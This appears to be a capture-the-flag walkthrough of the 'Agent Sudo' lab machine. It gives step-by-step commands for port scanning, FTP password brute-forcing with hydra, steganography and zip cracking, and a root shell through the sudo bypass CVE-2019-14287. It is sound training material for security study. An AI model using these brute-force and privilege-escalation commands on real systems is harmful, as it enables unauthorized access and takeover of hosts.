Skip to main content

Agent Sudo

1. Reconnaissance:

export TARGET_IP=10.10.17.101
nmap -p- --min-rate 5000 $TARGET_IP
Not shown: 65318 closed tcp ports (reset), 214 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

2. HTTP Service Analysis:

Navigating to http://$TARGET_IP/ reveals the following message:

Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R

This suggests that the website utilizes user-agent filtering. The message implies that valid user-agents might correspond to agent codenames.

3. User-Agent Enumeration:

The initial hypothesis is that agent codenames might correspond to letters of the alphabet. curl is used to spoof the user-agent and identify a valid codename.

curl -A "R" -L $TARGET_IP
What are you doing! Are you one of the 25 employees? If not, I going to report this incident

This message suggests "R" is not a valid user-agent.

curl -A "C" -L $TARGET_IP
Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>
From,<br>
Agent R

This reveals a username, "chris," and suggests his password might be weak.

4. FTP Password Cracking:

hydra -V -l "chris" -P /usr/share/wordlists/rockyou.txt ftp://$TARGET_IP -f

Hydra successfully identifies the password:

[21][ftp] host: 10.10.17.101   login: chris   password: crystal

5. FTP Access and File Retrieval:

FTP is used to connect to the target with the discovered credentials and retrieve all files.

ftp $TARGET_IP # Credentials: `chris:crystal`
ftp> mget * # Download everything

The contents of To_agentJ.txt are examined:

cat To_agentJ.txt
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C

This message indicates a steganography challenge. Agent J's password is hidden within cutie.png.

6. Steganography and ZIP Extraction:

binwalk is used to analyze cutie.png for embedded data.

binwalk -e cutie.png
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
WARNING: One or more files failed to extract: either no utility was found or it's unimplemented

Binwalk reveals an embedded ZIP archive. The zip2john tool is then used to prepare the ZIP archive's hash for cracking with john.

cd _cutie.png.extracted
zip2john 8702.zip > hash && john --wordlist=/usr/share/wordlists/rockyou.txt hash # alien
7z e 8702.zip

The password "alien" is recovered. The archive 8702.zip is extracted using 7zip. The extracted file To_agentR.txt is read.

cat To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R

The base64 encoded string "QXJlYTUx" is decoded to "Area51".

echo "QXJlYTUx" | base64 -d # Area51

The string "Area51" is likely another password.

7. Steghide Extraction and User Password Retrieval:

steghide extract -sf cute-alien.jpg # Password: Area51
cat message.txt

The extracted message.txt reveals the password for user "james":

Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris

8. SSH Access and Privilege Escalation Assessment:

ssh james@$TARGET_IP # Password: hackerrules!
id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

The output of id confirms successful login as "james" and reveals that he is a member of the sudo group.

The file Alien_autospy.jpg is downloaded for further analysis.

Attacker Machine
scp james@$TARGET_IP:~/Alien_autospy.jpg . # Password: hackerrules!

Searching for "Roswell alien autopsy" reveals the incident is the Roswell alien autopsy.

The sudo -l command is used to determine what commands "james" can execute with elevated privileges.

Target Machine
sudo -l
(ALL, !root) /bin/bash

The output indicates that "james" can run /bin/bash as any user except root. This restriction can be bypassed due to a known vulnerability in sudo versions prior to 1.8.28 (CVE-2019-14287).

sudo --version # Sudo version 1.8.21p2

9. Privilege Escalation (CVE-2019-14287):

The vulnerability allows specifying a user ID of -1 which sudo interprets as user ID 0 (root).

sudo -u#-1 /bin/bash
id # uid=0(root) gid=1000(james) groups=1000(james)

The id command confirms that the shell is now running as root.